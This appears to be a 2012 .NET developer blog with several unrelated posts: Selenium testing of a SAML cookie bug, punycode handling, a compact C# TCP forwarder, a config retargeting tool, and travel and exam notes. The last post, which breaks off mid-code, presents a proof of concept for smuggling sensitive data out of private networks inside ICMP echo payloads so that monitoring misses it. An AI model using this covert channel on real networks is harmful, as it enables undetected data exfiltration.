Wednesday, December 12, 2012

Pitfalls on WIF+SAML2 and Selenium

WIF and SAML 2.0

First some background: There is a known issue on WIF (Windows Identity Foundation) for SAML 2.0 that generates cookies with a name being a GUID and the value, base64 encoded data that grows every SAMLRequest the module handles. The decoded value looks like: 0;1;2;3;4;5;6;7;8;9;10;11;12;13;14;15
It starts with small ones but get really, really large.

Every client gets one of these cookies and each time they are bigger, to the point that when they are sent back to the server, an HTTP error is thrown: HTTP 400 - Bad Request (Request Header too long)

This msdn link has a comment with the first steps to take in case you end up with this problem. They are very straight forward and we did them even before ending up on that msdn page. Regarding their forth step (final "fix"), in our case, it was decided a different solution.

The solution here was to remove the cookies before they would be sent out to the user in the first place. This way, even though for some really short time the cookie existed in memory at the server, the client never got to know of its existence. Do achieve that, login and logout gotta be changed. That is: SignIn and RedirectingToIdentityProvider events from the Saml2AuthenticationModule. At that point in the event pipeline, the underlying Microsoft WIF code had already added the cookies to the Response, which gives us opportunity to remove them before the headers are sent out to the client.

Which takes us to Selenium:

The final solution had to be tested before dropping new build to production. And to test it, we had to reproduce it. The issue was not known during Dev or QA phases/environments, it did not happen, so the first step was to be able to reproduce it on a controlled environment.

Basically the idea was to use Selenium to simulate few dozens of users logging in and off in parallel until a cookie matching a GUID (plus a number?) would be received by one of the clients. There was no need to let it grow to the point of having: HTTP 400 - Bad Request (Request Header too long)

For that, I wrote a small application to spawn a thread for each IWebDriver (threads from the pool were conflicting the Drivers), each logging in with a different user account, removing the cookies (so user would be challenged again) and starting over.

The code would detect the existence of the cookie and stop the test, but to make visible (the cookies in and out) we can load Selenium driver with Firebug enabled and the cookie tab enabled and visible as default.

That goes like:

const string firebug = @"firebug-1.10.6-fx.xpi";
IWebDriver driver;
if (includeFireBug && File.Exists(firebug))
 var profile = new FirefoxProfile();
 // Set default Firebug preferences
 profile.SetPreference("extensions.firebug.currentVersion", "1.10.6");
 profile.SetPreference("extensions.firebug.allPagesActivation", "on");
 profile.SetPreference("extensions.firebug.defaultPanelName", "cookies");
 profile.SetPreference("", true);
 profile.SetPreference("extensions.firebug.cookies.enableSites", true);
 driver = new FirefoxDriver(profile);

I mentioned the code would check the cookies to look for the GUID one, and with selenium API, it's very simple to do so:

Guid test;
if (driver.Manage().Cookies.AllCookies.Any(p => p.Name.Length >= 37 
    && Guid.TryParse(p.Name.Substring(0, 36), out test)))

Just checked if it's big enough to be GUID, then tried to parse the GUID part of it (note it appends some number to sequentially divide them into 2k sized each).

Two domains involved in this test. The service provider, let's call:
And the identity provider:

Initially I set the IWebDriver Url property to the service provider:
Find the element for Login and fire a click. That would call the SAML module that would redirect the client to the identity provider:

The login and password input elements would be filled up and login button triggered in the IdP page.
At this point, the session cookie from the IdP was sent to the browser, under domain, and client redirected back to SAML flow finished and session cookies from also sent to the client.

That's all we need to reproduce the issue. However, these steps had to be done over and over, several times until the issue would happen. Particularly in our case, Logout was not possible since the accounts used were test account and thus not validated, so simply deleting the cookies would enable us restart the flow (and save us some requests/time). But this means deleting cookies from both and

Using Selenium API, I wrote:


Even though the method is called DeleteAllCookies, it deletes all cookies from the current domain on which the WebDriver is located. In this case,, since user just landed after the SAML login.
Looping the Cookies collection from within the WebDriver obviously would return only the cookies from the current domain.

It was the time for a second maneuver:
Setting the Url property of the WebDriver to anywhere under the domain that wouldn't return with a redirection, and call again DeleteAllCookies. That simple.
I browsed the root of the domain, without any resource id, which returned 403.14 - Directory listing denied. That was enough to run a code like:

// right after login flow finished (landed on, logged in)
driver.Manage().Cookies.DeleteAllCookies(); // deletes cookies
driver.Url = "";
driver.Manage().Cookies.DeleteAllCookies(); // deletes cookies

After that the flow could be re-initiated. After few hundreds of times, we could reproduce the issue, add the fix, run the test again with thousands of logins, without any issues. 

Saturday, November 10, 2012

Top level domains and punycode with C#

Punycode is used to encode Unicode characters into ASCII for IDN (Internationalized domain name).

On the RFC 3492 you'll find:

"Punycode is a simple and efficient transfer encoding syntax designed for use with Internationalized Domain Names in Applications (IDNA). It uniquely and reversibly transforms a Unicode string into an ASCII string."

Now if you are looking for validating TLD (Top level domains), you must have that information in mind. The ICANN list of TLD also contains the IDN ccTLD that started to be included in 2010.

Some Punycode encoded examples from that list:
The prefix is XN-- makes it easier to identify the Punycode enconded strings.

Luckily the since version 2.0, the .Net Framework offers a class to deal with IDN (Punycode and the Nameprep it has to do prior to encoding):


My goal was to receive a TLD (string) and validate it against the ICANN list of TLD. My first snippet throw an exception on line 4:
var tld = ".ਭਾਰਤ";
if (Regex.IsMatch(tld, @"[^\u0000-\u007F]"))
    tld = _IdnMapping.GetAscii(tld);
Exception message was: IDN labels must be between 1 and 63 characters long.

My speed reading techniques are quite bad.. In fact I don't have any. Sometimes I just focus on what I believe to be the most important part of the message (in this case "1 and 63 chars long" which didn't make sense) and I ended up missing something important (IDN labels).

I googled the exception, finding only these very useful (?!?) Exception translation websites and nothing more.
Only to better read the message and realize that the catch was that IdnMapping works with domain name labels:

"A constituent part of a domain name. The labels of domain names are connected by dots. For example, "" contains three labels — "www", "iana" and "org". For internationalized domain names, the labels may be referred to as A-labels and U-labels."

Therefore, my input was simply broken considering it started with a dot. If you are looking to validate the complete list of TLD, including ccTLD, or even the complete domain with multiple labels supporting IDN, the IdnMapping class is a go. However, make sure your code does not have leading or trailing dots by having it Trim('.') or something.

Regarding the IDNA versions, on the .Net framework prior to version 4.5 works with version 2003. Now if you are running .Net Framework 4.5 on Windows 8, the IDNA 2008 will be used.

Tuesday, October 9, 2012

Simple TCP Forwarder in C#

When people ask: What would I use a TCP Forwarding tool for?
Normally the answer goes like "to eavesdrop someone's connection".

Most of our connections go over SSL (at least the most important ones) and the certificate would be invalidated in case a MITM would be on going.

There are some troubleshooting situations when one would use a TCP forwarding tool as a proxy from one box to another but on what basis this technique/tool is used can vary a lot.

There are many TCP forwarding tools available on the web. However, the truth is that no one wants to get a whole solution out of a compressed file, fire Visual Studio when accessing a computer via command line (read: reverse shell here?). On top of that, I wanted to have some fun, so I decided to write one.

And how complicated is to write a TCP Forwarding tool? Or a TCP proxy if you prefer, in C#?

It takes only 66 lines of code using plain Socket class. And it's fun!
using System;
using System.Net;
using System.Net.Sockets;

namespace BrunoGarcia.Net
    public class TcpForwarderSlim
        private readonly Socket _mainSocket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);

        public void Start(IPEndPoint local, IPEndPoint remote)

            while (true)
                var source = _mainSocket.Accept();
                var destination = new TcpForwarderSlim();
                var state = new State(source, destination._mainSocket);
                destination.Connect(remote, source);
                source.BeginReceive(state.Buffer, 0, state.Buffer.Length, 0, OnDataReceive, state);

        private void Connect(EndPoint remoteEndpoint, Socket destination)
            var state = new State(_mainSocket, destination);
            _mainSocket.BeginReceive(state.Buffer, 0, state.Buffer.Length, SocketFlags.None, OnDataReceive, state);

        private static void OnDataReceive(IAsyncResult result)
            var state = (State)result.AsyncState;
                var bytesRead = state.SourceSocket.EndReceive(result);
                if (bytesRead > 0)
                    state.DestinationSocket.Send(state.Buffer, bytesRead, SocketFlags.None);
                    state.SourceSocket.BeginReceive(state.Buffer, 0, state.Buffer.Length, 0, OnDataReceive, state);

        private class State
            public Socket SourceSocket { get; private set; }
            public Socket DestinationSocket { get; private set; }
            public byte[] Buffer { get; private set; }

            public State(Socket source, Socket destination)
                SourceSocket = source;
                DestinationSocket = destination;
                Buffer = new byte[8192];

No rocket science here: using both Asynchronous (good old CLR APM in this case) and Synchronous Socket programming, few C# lines of code with one method exposed as an entry point taking the endpoints as parameter.

When I say asynchronous and synchronous, it's because the code has three synchronous methods from the Socket class been called. The first is the Socket.Accept() which blocks the thread until a connection is received. I chose this technique so that the Start method would never return and the main thread would handle the main socket.

The second synchronous method used is Socket.Send. This method also blocks the thread (in this case will be a thread from the ThreadPool due to async I/O that fired the receive callback). When one socket receives data, it forwards to the second socket in a synchronous manner, before asynchronously restarting to receive data.

In fact, a few tests I ran (where one socket is only flushing all buffer to a second socket) using BeginSend (asynchronous Socket.Send) performed slower then the synchronous Send.

Third, the Socket.Connect() which initiates the connection with the remote endpoint, where you want the data you send to the program to be forwarded to.

Once a connection is established, APM is used with BeginReceive/EndReceive to receive data. This means each pair of sockets will receive data using APM and use the same thread from the pool that called the callback to send the data to the other socket.

Let's run it!

Previously, I just wrote a class, right? That's far from having an executable.
As I mentioned before, my idea here was not to have yet another TCP Forwarding tool on Github, codeplex or codeproject, with dozens of files, so that we could forward some data.

So I propose a small change to the code above:
Let's add a static Main method to that class and build it as a command-line application:

        static void Main(string[] args)
            new TcpForwarderSlim().Start(
                new IPEndPoint(IPAddress.Parse(args[0]), int.Parse(args[1])),
                new IPEndPoint(IPAddress.Parse(args[2]), int.Parse(args[3])));

After that we can compile it with:

csc /o+ /debug- /out:TcpForwarder.exe /t:exe TcpForwarderSlim.cs

Even though I used C# compiler vesion: 4.0.30319.17020, code will compile just fine even with version 2.0 of the .Net Framework. The generated assembly has size: 5,632 bytes.

Let's try it out by browsing xkcd. We get their IP address and setup the tunnel:

Pinging [] with 32 bytes of data:

C:\>TcpForwarder.exe 12345 80

Viewing xkcd via TCP Tunnel
Great comics by the way! As usual.

Notice the address bar contains localhost:12345, which makes sense considering we set up the tunnel as: port 12345 as local endpoint. On the bottom of the screenshot there's the Firefox extension DNS Flusher bar that shows ::1 which is the loopback address in IPv6.

If you think I might have a copy of xkcd comics number 1118 on my hard drive (the whole page, actually) and a web server binding port 12345, that's not the case. :)

Now, we have a class file with 73 lines of code (after adding the static Main method) but there's still some manual job in order to get the tunnel working. So let's try to automate this a bit more. Perhaps scripting the whole thing?!

The code can be a lot smaller if using minification. Got a nice hint on Stack overflow using Visual Studio find and replace with Regex: :Wh+

We create a script, let's say buildTcpForwarder.cmd, not forgetting to escape the > sign with ^ so that the interpreter ignores it. Note I have the path to the C# compiler (csc.exe) on my PATH environment variable

echo using System; using System.Net; using System.Net.Sockets; namespace BrunoGarcia.Net { public class TcpForwarderSlim { private readonly Socket MainSocket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); static void Main(string[] args) { new TcpForwarderSlim().Start( new IPEndPoint(IPAddress.Parse(args[0]), int.Parse(args[1])), new IPEndPoint(IPAddress.Parse(args[2]), int.Parse(args[3]))); } public void Start(IPEndPoint local, IPEndPoint remote) { MainSocket.Bind(local); MainSocket.Listen(5); while (true) { var source = MainSocket.Accept(); var destination = new TcpForwarderSlim(); var state = new State(source, destination.MainSocket); destination.Connect(remote, source); source.BeginReceive(state.Buffer, 0, state.Buffer.Length, 0, OnDataReceive, state); } } private void Connect(EndPoint remoteEndpoint, Socket destination) { var state = new State(MainSocket, destination); MainSocket.Connect(remoteEndpoint); MainSocket.BeginReceive(state.Buffer, 0, state.Buffer.Length, SocketFlags.None, OnDataReceive, state); } private static void OnDataReceive(IAsyncResult result) { var state = (State)result.AsyncState; try { var bytesRead = state.SourceSocket.EndReceive(result); if (bytesRead ^> 0) { state.DestinationSocket.Send(state.Buffer, bytesRead, SocketFlags.None); state.SourceSocket.BeginReceive(state.Buffer, 0, state.Buffer.Length, 0, OnDataReceive, state); } } catch { state.DestinationSocket.Close(); state.SourceSocket.Close(); } } private class State { public Socket SourceSocket { get; private set; } public Socket DestinationSocket { get; private set; } public byte[] Buffer { get; private set; } public State(Socket source, Socket destination) { SourceSocket = source; DestinationSocket = destination; Buffer = new byte[8192]; } } } } > source.cs

csc /o+ /debug- /out:TcpForwarder.exe /t:exe source.cs

TcpForwarder.exe %1 %2 %3 %4

Now just call the script:

C:\buildTcpForwarder.cmd 12345 80

C:\>echo using System; using System.Net; using System.Net.Sockets; na
mespace BrunoGarcia.Net { public class TcpForwarderSlim { private readonly Sock
et MainSocket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, Protoc
olType.Tcp); static void Main(string[] args) { new TcpForwarderSlim().Start( new
 IPEndPoint(IPAddress.Parse(args[0]), int.Parse(args[1])), new IPEndPoint(IPAddr
ess.Parse(args[2]), int.Parse(args[3]))); } public void Start(IPEndPoint local,
IPEndPoint remote) { MainSocket.Bind(local); MainSocket.Listen(5); while (true)
{ var source = MainSocket.Accept(); var destination = new TcpForwarderSlim(); va
r state = new State(source, destination.MainSocket); destination.Connect(remote,
 source); source.BeginReceive(state.Buffer, 0, state.Buffer.Length, 0, OnDataRec
eive, state); } } private void Connect(EndPoint remoteEndpoint, Socket destinati
on) { var state = new State(MainSocket, destination); MainSocket.Connect(remoteE
ndpoint); MainSocket.BeginReceive(state.Buffer, 0, state.Buffer.Length, SocketFl
ags.None, OnDataReceive, state); } private static void OnDataReceive(IAsyncResul
t result) { var state = (State)result.AsyncState; try { var bytesRead = state.So
urceSocket.EndReceive(result); if (bytesRead > 0) { state.DestinationSocket.Send
(state.Buffer, bytesRead, SocketFlags.None); state.SourceSocket.BeginReceive(sta
te.Buffer, 0, state.Buffer.Length, 0, OnDataReceive, state); } } catch { state.D
estinationSocket.Close(); state.SourceSocket.Close(); } } private class State {
public Socket SourceSocket { get; private set; } public Socket DestinationSocket
 { get; private set; } public byte[] Buffer { get; private set; } public State(S
ocket source, Socket destination) { SourceSocket = source; DestinationSocket = d
estination; Buffer = new byte[8192]; } } } }  1>source.cs

C:\>csc /o+ /debug- /out:TcpForwarder.exe /t:exe source.cs
Microsoft (R) Visual C# 2010 Compiler version 4.0.30319.17020
Copyright (C) Microsoft Corporation. All rights reserved.

C:\>TcpForwarder.exe 12345 80

The source file is generated, built and the tunnel starts with the parameters we passed to the script so we can check xkcd once more via TCP Forwarding.

Wednesday, August 8, 2012

Organizing Debugging Sessions

When working with Enterprise applications, with thousands of lines of code (aka: KLOC) and hundreds of references, several techniques are used to improve productivity when it comes to debugging code. It's very common to end up debugging the same portion of the system from time to time and too often these are source files from different solutions, spread in a huge source tree.

Once we are done with debugging something, perhaps not deleting the breakpoints and start to debug something else, it happens to get stuck with those "old" breakpoints. First reflex is to hit F5 so flow can continue, only until that happens enough times so we actually remove them. At least for me that's a bit annoying and counter productive.

Perhaps we just Disable all breakpoints? Fine, works well, but it happens that you keep doing it until the point you enable them again to get some back and end up having several breakpoints you really don't need at that point. Here starts that annoying behavior again.

Last option would be to delete all breakpoints when you start debugging something else. However, at some point you'll wish you had those breakpoints, especially those Conditional breakpoints or When hit/ Run macro, because you are back looking at that portion of the system once more.

But wait! Who said that was the last option?

This is when the Import and Export breakpoints for Visual Studio has its best use. You can read a lot about "handing off a debugging session to another developer" as the main reason to use it, and for sure it's valid but I believe the most common reason to use this would be to organize your own debug sessions.

My objective here is not to describe how to import and export breakpoints, this is very straight forward and you can check it here. I'd like to point out that as we have these t-sql scripts saved, to make our lives easier when troubleshooting database related issues, saving your breakpoints can save you a lot of time when debugging code.

This is mostly useful when working with huge applications, with many source files that are part of your debugging but are not part of the solution you have loaded with Visual Studio. Once you have imported your breakpoints, you can easily open any file by double clicking the breakpoint on Breakpoint window (CTRL + D, B).

If you don't organize your debug sessions by importing and exporting breakpoints, give it a try!

Friday, June 29, 2012

Paranoid android

I have been finding quite hard to trust nearly any application for many years. When you think of the underlying infrastructure that exist to enable you hit a server, download a piece of software and everything that could go wrong.

What if I'm hitting a spoofed DNS Server?
my access point was cracked?
one hacked the telco router and is deviating my traffic through another box?
or what if I already have some piece of software installed eavesdropping my browsing?

This paranoid list could go on forever. Obviously there's something you can do to avoid or monitor each of these items, but the truth is that you can never say, 100%, that every page you hit will be harmless and there is no malicious code running on your computer or that some piece of software is completely safe to be executed without some privacy concerns or whatever.

When you think about all these exploits coming out, for all kind of software, you can get quite paranoid.
Like on Windows, you click a file with extension .docx, well, you know Word will fire up and parse that file.
You know that there was already problems with Microsoft Office, Flash, and several other softwares, when parsing that would execute some shellcode stored in that file, and you would have no idea by looking at "its Word document Icon".
What about web related security issues? I suppose I'm not the only paranoid, am I?

I'm going on a trip this weekend and I decided to download a set from Astrix, from Youtube. That's legal, right? Can I write this here? Anyhow, I changed my mind and didn't! ;)

There are tons of websites dedicated for that, but they aren't happy to do videos longer than 1 hour and I had to think of another way.

For long I've known that it's always a bad idea to download these "tools", but I decided to give it a try.
Found a mainstream one, from dvdvideosoft, called Free Youtube to Mp3.

Downloaded the quite big package, 26 Mb... And the first thing that popped in my head was:

Unlike Stuxnet and Duqu which had a specific target, Flame is more generic and its size is 20 mega bytes, which is huge considering that anti-virus experts have seen codes of just 1 mb so far

Waited for the Antivirus to popup or something, calling me stupid, but nothing happened.
Since the paranoia doesn't go away, I thought: Let's check if the file is signed:

All seems good, time to get some Astrix!
Ran that stuff, read (ok, like 20% of) the privacy agreement, everything went fine and I fired up the app.

Aha! So now I got two windows, one from the App, and the other one from Symantec Antivirus!
My thoughts, throughout 3.2 milliseconds were:
  • F%$*& I knew this was crap.
  • This means that all other apps I executed, and my anti virus didn't pop up, were freaking malware?
  • False positive maybe? Try not to be too paranoid dude!
  • I suppose the reverse shell is running right now.... 

The message from the antivirus was:


Target:  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.1000.157.105\Bin\ccSvcHst.exe
Event Info:  Create Process
ActionTaken:  Blocked

And again:


Target:  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.1000.157.105\Bin\SavUI.exe
Event Info:  Create Process
ActionTaken:  Blocked

This kind of situation does not help a paranoid guy. Finally I uninstalled the program and made new plans for a new VM where I can grow a colony of viruses while testing stuff out.


I'm currently reading CLR via C# from Jeffrey Richter and when he talks about .NET framework deployment goals and why Microsoft Windows has a reputation for being unstable and complicated. I found something I think it's worth quoting here:

"... The third reason has to do with security. When applications are installed, they come with all kinds of files, many of them written by different companies. In addition, Web applications frequently have code (like ActiveX controls) that is downloaded in such a way that users don't even realize that code is being installed on their machine. Today, this code can perform any operation, including deleting files or sending e-mail. Users are right to be terrified of installing new applications because of the potential damage they can cause. To make users comfortable, security must be built into the system so that the users can explicitly allow or disallow code developed by various companies to access their system's resources."

- Jeffrey Richter, CLR via C# third edition.

This paragraph and specially the text highlighted (by me) gives me the feeling I'm not alone in this paranoia. :)

Tuesday, May 22, 2012

Re-targeting multiple Asp.Net Web App from 3.5 to 4

I understand it's a bit late to be doing it but better late than never. I got this .Net Framework 3.5 project to convert to .Net Framework 4...

Easiest way I know is: switch a value in a selection box and Visual studio does the changes for you.

However my situation was that I had several configuration files I would have to convert.
I found on msdn, instructions to perform the conversion manually and wrote each step into a quick-and-dirty command line application:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Xml.Linq;
using System.Xml.XPath;
using System.IO;

namespace RetargetFramework4
    class Program
        static void Main(string[] args)
            bool deleteWebServerSection = true;

            // justrun param will let if go without interruptions (and WILL execute step 7)
            if (args == null || !args.Any() || args[0] != "justrun")
                // try to make the user give up
                if (!Confirm(@"
This code runs the steps from: on all files ending with .config in the current folder.
Make sure you have them backed up.

Step 1: Make sure that the application currently targets ASP.NET 3.5!

Step 9: If you have customized the Web.config file, and if any customizations refer to custom assemblies or classes, make sure that the assemblies or classes are compatible with the .NET Framework version 4.

Are you sure you want to continue? (y/n)

                deleteWebServerSection = ShallPerformStepSeven();

            var configs = Directory.GetFiles(".", "*.config");
            Console.WriteLine("{0}Found {1}", Environment.NewLine, string.Join(", ", configs));

            ProcessConfigs(configs, deleteWebServerSection);


        private static bool ShallPerformStepSeven()
            return Confirm(@"
Please note that:
Step 7 is: Delete everything between the system.webserver section start and end tags, but leave the tags themselves.
But in fact retargeting a Web project from the project property tab with Visual Studio 2010 does NOT remove all child elements!

Plus, be aware of these:

Do you want to execute this step? (y/n)

        private static void ProcessConfigs(IEnumerable<string> configs, bool deleteWebServerSection)
            foreach (var config in configs)
                // 2 - Open the Web.config file in the application root.
                var xConfig = XDocument.Load(config);

                // 3 - In the configSections section, remove the sectionGroup element that is named "system.web.extensions".
                var webExtensions = xConfig
                if (webExtensions != null)

                // 4 - In the system.web section, in the compilation collection, remove every add element that refers to an assembly of the .NET Framework.
                var assembliesAdd = from a in xConfig
                                    let assembly = (string)a.Attribute("assembly")
                                    where assembly != null && assembly.StartsWith("System.")
                                    select a;
                if (assembliesAdd.Any())

                // 5 - Add a targetFramework attribute to the compilation element in the system.web section, as shown in the following example:
                var compilation = xConfig.XPathSelectElements("configuration/system.web/compilation").FirstOrDefault();
                if (compilation != null)
                    compilation.SetAttributeValue("targetFramework", "4.0");

                // 6 A - In the opening tag for the pages section, add a controlRenderingCompatibility attribute, as shown in the following example:
                var pages = xConfig.XPathSelectElements("configuration/system.web/pages").FirstOrDefault();
                if (pages != null)
                    pages.SetAttributeValue("controlRenderingCompatibilityVersion", "3.5");

                // 6 B - In the system.codedom section, in the compilers collection, remove the compiler elements for c# and vb.
                var codedom = from a in xConfig
                              let language = (string)a.Attribute("language")
                              where language != null
                              && (language.StartsWith("c#") || language.StartsWith("vb"))
                              select a;
                if (codedom.Any())

                // 7 - Delete everything between the system.webserver section start and end tags, but leave the tags themselves.
                if (deleteWebServerSection)

                // 8 - Delete everything between the runtime section start and end tags, but leave the tags themselves.

                xConfig.Save(config, SaveOptions.None);
                Console.WriteLine("Finished with {0}.", config);

        private static bool Confirm(string message)
            return Console.ReadKey().KeyChar == 'y';

Use it in a script if you'd like, to be able to re-target an ASP.Net Web Application from version 3.5 to 4.0.
It could be useful to re-target many applications, with multiple web.configs, from the command prompt: 

for /f %a in ('dir /s /b web.config') do cd %a\.. & RetargetFramework4.exe justrun 
Note that if you are calling it from within a batch (.bat or .cmd) script file, % becomes %% 

Make sure your config files are not marked as readonly (they probably will if you are using Source control and have not them checked out). So check them out or remove the readonly attribute: 

attrib -r web.config

Sunday, May 20, 2012

Google Maps vs Bing Maps

After planning trips for about 30 countries, road trips or not, my browser learned that when I press m, I'm looking for Google Maps:

This time, my trip will go through Bosnia and Herzegovina, and there was a problem though. Google Maps won't find routes through it.

We could not calculate directions between Belgrade, Serbia and Sarajevo, Bosnia and Herzegovina.

Another test showed that not only from outside Bosnia but also within the country:

We could not calculate directions between Banja Luka, Bosnia and Herzegovina and Sarajevo, Bosnia and Herzegovina.

That's when I gave a try to Bing Maps. It was a moment of surprise to see the route calculated until I noticed it looked quite weird:

Belgrade - Sarajevo with Bing Maps (
The route created clearly was too long, having 394 kilometers (244 miles).

After a quick research I found on Sarajevo wikitravel:

From Belgrade (Serbia) - taking direction to Sabac - Zvornik - Vlasenica - Sokolac - Sarajevo.

Using this tip, I decided to "help" Bing Maps by adding these locations on the way. The result, the least I can say, was funny! :)

Belgrade - Sarajevo and more with Bing Maps (

A way of 632 kilometers (392 miles), completely insane!

The situation is that Google Maps won't give directions with a location inside Bosnia and Bing Maps seems to make fun of me. Finally, I got it surprisingly with Michelin.

Belgrade - Sarajevo with Via Michelin (

A route with 305 kilometers (189 miles)

Today's battle Microsoft vs Google, the winner was Michelin!

Friday, April 27, 2012

MCPD upgrade, 70-523 exam

So today I finally did the 70-523 exam in order to upgrade the certification with the longest title ever created:

Microsoft Certified Professional Developer .Net Framework 3.5 Web Developer
Microsoft Certified Professional Developer .Net Framework 4 Web Developer

Two characters shorter now, though.

Almost 1 year and a half now since I did the 70-567, to upgrade from .Net 2.0 to 3.5 which means I was already late, considering .Net 4.0 was already launched. The .Net Framework 4.5 is on Developer preview so I guess I could finally catch up.

Like the 70-567 exam, this was composed by more than 1 exam. "An exam within an exam" once said Leonardo. In the case of 70-523, there was 4 exams:

TS Accessing Data with Microsoft .Net Framework 4
TS Windows Communication Foundation Development with Microsoft .Net Framework 4
TS Web Applications Development with Microsoft .Net Framework 4
Pro: Designing and developing Web Applications Using Microsoft .Net Framework 4

Which means you get 3 MCTS and 1 MCPD certificates.

The countdown was per exam, 40 minutes, which was more then enough considering the questions are straightforward, with few text to read.
The way Microsoft does these tests is interesting. I've been doing these exams since 2006 it has always been the same. When I say "the way", I mean normally select 1 out of 4 options, or select 2 out of 6 where:

Each option is a complete solution
Both answers together make the solution

The idea that "it's never something too hard to do" is always valid and really helps a lot when you are not sure about the answer. Indeed they always include some questions regarding something you'll never see in your life, but we shouldn't have a hard time if we use the principle: "It's never too complicated".

So they asked something like:

You work for Lorem Ipsum Inc and you have a WCF service you must log all message exchanges. What do you do?

A - Create this config <binding>tralálá..</binding>
B - Create a new project, reference you old service assembly's to the new project, delete the Chrome shortcut from your desktop and make sure you use Internet Explorer and Bing.
C - Copy paste the service implementation and deploy both services on the same server.
D - Buy a new server, setup load balance and deploy your service.

Ok. I made it sound extremely ridiculous, but I want to prove a point here: Which one would you select?
Even if you have no idea what the above text is talking about, if you follow the principle I mentioned, you would select the first option.

How to be prepared? I'm hopping you have a full time job working with Microsoft Technology, this really helps! Plus, most places you work, you don't have the chance to use every single new thing Microsoft launches as part of a new release of .Net Framework, so having a private project or at least play with it at home once in a while does help. On top of that, the standard way of study, (I suppose it's still standard), books.

I read these 3:

MCTS Self-Paced Training Kit (Exam 70-515): Web Applications Development with Microsoft .NET Framework 4 (Mcts 70-515 Exam Exam Prep)

MCTS Self-Paced Training Kit (Exam 70-516): Accessing Data with Microsoft .NET Framework 4

MCPD 70-519 Exam Ref: Designing and Developing Web Applications Using Microsoft .NET Framework 4

If you did 70-536 exam, a number I won't forget because took me a long time to be prepared to and the number of questions regarding pieces of the Framework I have never used were amazing, you might have read this book. It was written by the same guy who wrote the last book I listed above, Tony Northrup.

One thing worth mentioning: I was surprised by the number of errors on the 70-519 book by Tony Northrup, but since it was its first release (5 months ago), it's understandable. I enjoy reading his books but I was hoping better from Microsoft Press review people.

Sunday, March 11, 2012

ICMP for stealth transport of data

ICMP (Internet Control Message Protocol) has been used for data transfer since always. Known as ICMP Tunnel, there are several projects and articles about this, mainly open source, like ICMP-Chat for unix-like that is about 10 years old now. Also an interesting article, explaining how to tunnel TCP over ICMP with a simple command line tool for unix-like environment, also ported to Windows.

In case you are not familiar with the idea, a description from Wikipedia follows:

"ICMP tunneling works by injecting arbitrary data into an echo packet sent to a remote computer."
"This vulnerability exists because RFC 792, which is IETF's rules governing ICMP packets, allows for an arbitrary data length for any type 0 (echo reply) or 8 (echo message) ICMP packets."

It is correct to say that ICMP is normally not considered a threat, at least not by the majority of network administrators. It's common to add security mechanisms (IDS, IPS, appliances, etc) to a corporate network, but in the end all types of ICMP packets, with all payload sizes etc, pass freely at least from within the private network to the outside world. This technique is used to send sensitive data outside a private network without relying on SMTP, HTTP or other upper layer protocol that are commonly monitored and logged.

The Sender:

The sender has very simple implementation. Considering the objective is to send data to the outside world, the reply is actually irrelevant. The Sender code does not require to handle the replies.

At first I started writing the Sender code with raw sockets, having lots of fun using binary operators (<<, >>, ~, etc), writing one's complement and reading the RFC 792. Then I found the code would only run when executing as administrator. The whole idea wouldn't make much sense if the Sender process requires elevated privilege. Take for example the ASP.NET Application Pool, as default, wouldn't be able to run it. And the worse is that this is not something new at all, SOCK_RAW function access was blocked to non administrator users as described by this Microsoft knowledge base article since Windows NT 4.0, which means, always.

I can still remember writing ICMP type 8 (echo request) packets with custom payload about 4 years ago, with C#, and without writing that much code anyway. So I tried the Ping class, introduced on .Net Framework 2.0 only to find a third parameter of type byte[] called buffer: Great! That's the payload. So this is the way to go.

A quick test with:

new System.Net.NetworkInformation

On Microsoft Network Monitor I see:

Custom ICMP payload

The Receiver:

Working with ICMP is not the same as standard TCP or UDP sockets. We don't need to Bind a socket to a logical port so the operating system knows which software will handle the packets. To better describe this, I will quote a paper from SANS institute:

Although ICMP messages are sent in IP packets and it uses IP as if it were a higher-level 
protocol, ICMP is in fact  an internal part of IP, and must be implemented in every IP 

Because of this behavior, monitoring processes and its TCP or UDP ports in use is pointless when using this technique.

When implementing the Receiver part of this PoC, I used Microsoft Network Monitor 3.4, which has an API and already comes with a wrapper class in C# called NetmonAPI.cs. So if you want to run this code, install Microsoft Network Monitor, and add NetmonAPI.cs to your project.

using System;
using System.Collections.Generic;
using System.Linq;
using System.Net;
using System.Net.NetworkInformation;
using System.Runtime.InteropServices;
using System.Text;
using Microsoft.NetworkMonitor;

namespace BrunoGarcia.Net
    /// <summary>
    /// Captures icmp packets of type Echo Request with its payload
    /// </summary>
    public unsafe sealed class IcmpPayloadCapturer : IDisposable
        readonly IcmpPayloadCaptured _payloadCapturedCallback;
        readonly CaptureCallbackDelegate _captureHandler;
        readonly List<uint> _adapterIndex = new List<uint>();
        readonly NmCaptureMode _captureMode;
        readonly int _icmpPayloadBufferSize;
        bool _isDisposed;
        uint _icmpFilterId, _icmpPayloadFieldId, _sourceIpFieldId, _icmpTypeFieldId;
        IntPtr _engineHandle, _frameParserHandle, _nplParserHandle, _configParserHandle;

        public delegate void IcmpPayloadCaptured(IPAddress sourceAddress, string payload);

        /// <summary>
        /// Monitors NICs for ICMP packets
        /// </summary>
        /// <param name="payloadCaptured">Delegate called when icmp type 8 is captured and its payload extracted</param>
        /// <param name="icmpPayloadBufferSize">Buffer size when reading the icmp data field</param>
        /// <param name="captureMode">Capture mode: This computer or anything it can listen from an Network Adapter</param>
        public IcmpPayloadCapturer(IcmpPayloadCaptured payloadCaptured, int icmpPayloadBufferSize = 2048,
            NmCaptureMode captureMode = NmCaptureMode.LocalOnly)
            _payloadCapturedCallback = payloadCaptured;
            _icmpPayloadBufferSize = icmpPayloadBufferSize;
            _captureHandler = new CaptureCallbackDelegate(CaptureCallback);
            _captureMode = captureMode;

        /// <summary>
        /// Starts capture of ICMP Echo Request payload
        /// </summary>
        /// <param name="adapters">Network Interfaces to intercept</param>
        public void Start(IEnumerable<NetworkInterface> adapters)
            if (_isDisposed)
                throw new ObjectDisposedException(GetType().FullName);

            if (NetmonAPI.NmOpenCaptureEngine(out _engineHandle) != 0)
                throw new Exception(@"Failed to load Capture Engine. Make sure you have:
Program running in Single Threaded Apartment (STA)
Microsoft Network Monitor 3.3 or later installed!");

